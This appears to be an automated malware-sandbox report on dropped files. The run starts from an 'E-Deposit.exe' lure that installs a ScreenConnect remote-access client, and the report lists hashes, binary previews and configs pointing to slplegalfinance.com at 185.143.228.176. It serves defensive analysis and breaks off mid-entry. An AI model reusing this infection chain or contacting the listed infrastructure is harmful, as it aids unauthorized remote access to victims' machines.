                                                                                  SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                  MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                  SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                  SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                  SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):11776
                                                                                  Entropy (8bit):5.273875899788767
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:V8/Qp6lCJuV3jHXtyVNamVNG1YZfCrMmbfHJ7kjvLjbuLd9NEFbM64:y/cBJaLXt2NaheUrMmb/FkjvLjbuZj64
                                                                                  MD5:73A24164D8408254B77F3A2C57A22AB4
                                                                                  SHA1:EA0215721F66A93D67019D11C4E588A547CC2AD6
                                                                                  SHA-256:D727A640723D192AA3ECE213A173381682041CB28D8BD71781524DBAE3DDBF62
                                                                                  SHA-512:650D4320D9246AAECD596AC8B540BF7612EC7A8F60ECAA6E9C27B547B751386222AB926D0C915698D0BB20556475DA507895981C072852804F0B42FDDA02B844
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..&...........E... ...`....... ..............................D9....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...4%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1721856
                                                                                  Entropy (8bit):6.639085961200334
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                  MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                  SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                  SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                  SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                  Process:C:\Users\user\Desktop\E-Deposit.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                  Category:dropped
                                                                                  Size (bytes):13369344
                                                                                  Entropy (8bit):7.966971359391998
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:1Wh0cGwKWh0cGEWh0cGrWh0cGAWh0cGwWh0cGJWh0cG7:1WacMWactWacYWaczWacRWacaWacW
                                                                                  MD5:DBA166C47F82656C2399F7223DE2DB3F
                                                                                  SHA1:9CF89A17AEF41E2C3BDE3761E1769B2831609FDF
                                                                                  SHA-256:20E07D53E0F53958D613CB374F001EBDBFF95ED2D96F2F46BCA286D408662B44
                                                                                  SHA-512:B19E49CE816783F04AADF28AB02E0692383C5A5A706AB9C6E7A7329023F5596915FC26B88B1C72C4D68E934F0DA61DF99DCFE0CCE166F62544E6D5245939215C
                                                                                  Malicious:false
                                                                                  Preview:......................>.......................................................{...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                  Category:dropped
                                                                                  Size (bytes):13369344
                                                                                  Entropy (8bit):7.966971359391998
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:1Wh0cGwKWh0cGEWh0cGrWh0cGAWh0cGwWh0cGJWh0cG7:1WacMWactWacYWaczWacRWacaWacW
                                                                                  MD5:DBA166C47F82656C2399F7223DE2DB3F
                                                                                  SHA1:9CF89A17AEF41E2C3BDE3761E1769B2831609FDF
                                                                                  SHA-256:20E07D53E0F53958D613CB374F001EBDBFF95ED2D96F2F46BCA286D408662B44
                                                                                  SHA-512:B19E49CE816783F04AADF28AB02E0692383C5A5A706AB9C6E7A7329023F5596915FC26B88B1C72C4D68E934F0DA61DF99DCFE0CCE166F62544E6D5245939215C
                                                                                  Malicious:false
                                                                                  Preview:......................>.......................................................{...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                  Category:dropped
                                                                                  Size (bytes):13369344
                                                                                  Entropy (8bit):7.966971359391998
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:1Wh0cGwKWh0cGEWh0cGrWh0cGAWh0cGwWh0cGJWh0cG7:1WacMWactWacYWaczWacRWacaWacW
                                                                                  MD5:DBA166C47F82656C2399F7223DE2DB3F
                                                                                  SHA1:9CF89A17AEF41E2C3BDE3761E1769B2831609FDF
                                                                                  SHA-256:20E07D53E0F53958D613CB374F001EBDBFF95ED2D96F2F46BCA286D408662B44
                                                                                  SHA-512:B19E49CE816783F04AADF28AB02E0692383C5A5A706AB9C6E7A7329023F5596915FC26B88B1C72C4D68E934F0DA61DF99DCFE0CCE166F62544E6D5245939215C
                                                                                  Malicious:false
                                                                                  Preview:......................>.......................................................{...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):423882
                                                                                  Entropy (8bit):6.57699164755521
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:wuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvz:wuH2anwohwQUv5uH2anwohwQUvz
                                                                                  MD5:AB2DCBCF1A9BE6E5B1477AA5F101E37A
                                                                                  SHA1:1C85B1C56C9FC04CC67B89928A416236452291D0
                                                                                  SHA-256:E8C66B279393D757FD7906D63D6E6EC8FDA0A7B296BE7555A22E08BC3F7BC828
                                                                                  SHA-512:79B86ED0272D44A1A399C8F7C6C113676369CFDAFD83C69D6B517CA58113C3CE14845713EBBCDFBC67B9FD8B182249AAAFE47B5F62D69FA21A73F05D038649FD
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSID57F.tmp, Author: Joe Security
                                                                                  Preview:...@IXOS.@.....@.-&Z.@.....@.....@.....@.....@.....@......&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}'.ScreenConnect Client (484f9eed1d8e13b9)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (484f9eed1d8e13b9)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{E29000A5-D988-BF34-ACFB-64A448AB1544}^.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{5D9AA345-F8BD-8991-FE6D-9CD87DEF2A88}f.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{12B3F4C9-0930-DE85-D0AC-49BFF78FE3DC}c.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileMa
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):207360
                                                                                  Entropy (8bit):6.573348437503042
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                  MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                  SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                  SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                  SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):207360
                                                                                  Entropy (8bit):6.573348437503042
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                  MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                  SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                  SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                  SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.1727426829039396
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:JSbX72FjxFlAGiLIlHVRpIh/7777777777777777777777777vDHFUVPV7rl0i8Q:JXHQI5wiV0F
                                                                                  MD5:CBEDF2C65F35023667659C5CB7AD856A
                                                                                  SHA1:9EEA39FADD963ADEC04FBB87E21989DFBACF0EC7
                                                                                  SHA-256:0214A3D479C450C204DEFA0A7466D5F7C26D280A665D8CD3B14895C04AF5FB8C
                                                                                  SHA-512:089C6C1C462C7750C22C0A8C719ABDD97CF20450A1B02EA77EFDEFE21E09A0E9DC9A6AA11B346C02BD88CF04A11FEBB0703BD8E132340FE95124A269E3EDDB29
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.8016387648894603
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:L8PhDuRc06WXzuFT5nP979BIsqcq56Adum1Si5zaIdSAYxXV3jzoo7rWAdum1SI6:yhD1zFTXzuph1fdaIdAxJH11
                                                                                  MD5:34A8C52EFBBB37599363A63A30D0E932
                                                                                  SHA1:1ABE2E86C5352B362F58606F927FE267F82A504D
                                                                                  SHA-256:CC1556D554C2917516FB7554BEAF11742A17CF25270298DBCBFC95F180933E5B
                                                                                  SHA-512:7F446DF0540E1661C1DC892B5DAFD65779CF3FE5EAAA3BBB5F2EFC04EA1D44420174A7C819210D41747B32FE6C5BD4D1336EBF8D17EB527FC745BEDF197D84D3
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                                  Category:dropped
                                                                                  Size (bytes):435
                                                                                  Entropy (8bit):5.289734780210945
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                                                  MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                                  SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                                  SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                                  SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                                  Malicious:false
                                                                                  Preview:..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):432221
                                                                                  Entropy (8bit):5.37517068681202
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauj:zTtbmkExhMJCIpErW
                                                                                  MD5:661EA1A8C7E6A4A782BEC293B743DB0F
                                                                                  SHA1:5D1742B5CA1EC39C1D87DEB40A9E0BD2D3AF02AC
                                                                                  SHA-256:88D0E2E754775D377147E676971BDD588A08CBEE7CA4E911FCBAA953D5CE97AF
                                                                                  SHA-512:F44A88B6F1BB063C1B70F440E91DE5A3A2D39637E1CB06E9272317AB4A8D03B8CD992020EE02ECB6836676C9FDE6EE82D3399A09C4D4EAB54B5222F833402769
                                                                                  Malicious:false
                                                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.033616556478228
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLC/vXbAa3xT:2dL9hK6E46YPaDEIvH
                                                                                  MD5:BE24C9E257ED8EC178152AEE4016250D
                                                                                  SHA1:C90E325FC71AF04C42707F0EF692ABD6CD3F93C6
                                                                                  SHA-256:CE28835E5D79F494A8518F5BAAC924FE2B34A31FD041584E336A4E835517712D
                                                                                  SHA-512:B6A4E758CE006D896C6F7C18467222A0AABCFA0E0E02A885C1799726E1518AC86CD919404E5CDB23EB0982B4B55361356696ED6B1F4878405693673BEA903257
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a48%3a12</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.035566031827628
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLD5/vXbAa3xT:2dL9hK6E46YPaDEDRvH
                                                                                  MD5:DB0217BDD9994B8F636F6CEB7D50A573
                                                                                  SHA1:9D805F3B3AD6D68AE99C4A99756D6DF7ECEA7DF9
                                                                                  SHA-256:759159E75E4159990E608F519AA786D2BB0A33C8981FFC2C01DFE6CFB07B14C2
                                                                                  SHA-512:DC49EFE627BB41910A336CC2AA4910984F06F65FD3230418F0FB5F410ECDB12E2F4E167BCD31B13BAD1CE9143B349E8F8FB3932AC0AF65D60B83EE598F659A55
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a47%3a14</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.036871464815543
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLkD6ev/vXbAa3xT:2dL9hK6E46YPaDEkX3vH
                                                                                  MD5:17AB7415565660ABFC8B16ABB1EA9B85
                                                                                  SHA1:438926C9544F0F5E2189F3F136B95BBEEB7C0976
                                                                                  SHA-256:5FBADB447DF1099A78C5C3E62DAA727E84B73A5ADF473210981D3F59E2E0E0C6
                                                                                  SHA-512:9BBFA3664C49C77C84DA51A8AA86D5DC5C1A4FFE10EAF2B13A1E84D3AFE74E0EFB8B1A20FF345CB52D136E7CDD7441B30A64EB82F13EDDF8D69D9A3619F08B97
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a46%3a45</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.036871464815543
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLkDWI/vXbAa3xT:2dL9hK6E46YPaDEk/vH
                                                                                  MD5:DC92BC2AAE2EB22C1841137BFF29B735
                                                                                  SHA1:C3F99E0EE59070A4D9290D9798DAD08401C1C4B8
                                                                                  SHA-256:36B3D793EF6270A1A7B1D34BB30103AD9151DDCE5F727B590FFA39D4958D94A8
                                                                                  SHA-512:03A3B8D3070C228D2C7CD90E1E45FBC781B6F817D0DF07DDBABFF9ABE457B6F677978CC8750B52F87F885AE24B3A8F7B1F06447E79A590E9E5D7E298C53C9591
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a46%3a34</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.035566031827628
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLkDn/vXbAa3xT:2dL9hK6E46YPaDEkDvH
                                                                                  MD5:1AD4D215525105E2D9DE4449E31A9D6B
                                                                                  SHA1:19CC3497FCDAAE3983D2EE4892CF884BB5EE8B46
                                                                                  SHA-256:5149B9AA3DEDFA24F2A47BD2FCAF2BB377BB8D501C7BEAE221167CDC90D1831E
                                                                                  SHA-512:A2643F9B6F819F0FE506BD24D6175794D1D7A6A84176EF53B27218293CCD11A3410F373B26DE87D192F14C0BB1371F748C6D09058E2898C27298CB1B1B0CE043
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a46%3a16</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.036210074189112
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLkDlgQv/vXbAa3xT:2dL9hK6E46YPaDEkLvH
                                                                                  MD5:AB7C97CC9746EE1A4497BAD133FE4DDA
                                                                                  SHA1:EA792D05B0ECC420257B933F0AF235F9ED1C290E
                                                                                  SHA-256:AD74C72F58BB7D3E96C795F0BF0DFA2F24BBBC16580486F8094ADEC340DE81A2
                                                                                  SHA-512:26B7537A58B1C855AD1848926958EFEFB89DFDCE3B32D3EF62E480576F641F95D9D2C27A09FBCD7BB62AF7F1BCBE96F8DF8516408E467FA405C6FFB0F2AEE146
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a46%3a27</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.0375155071770275
                                                                                  Encrypted:false
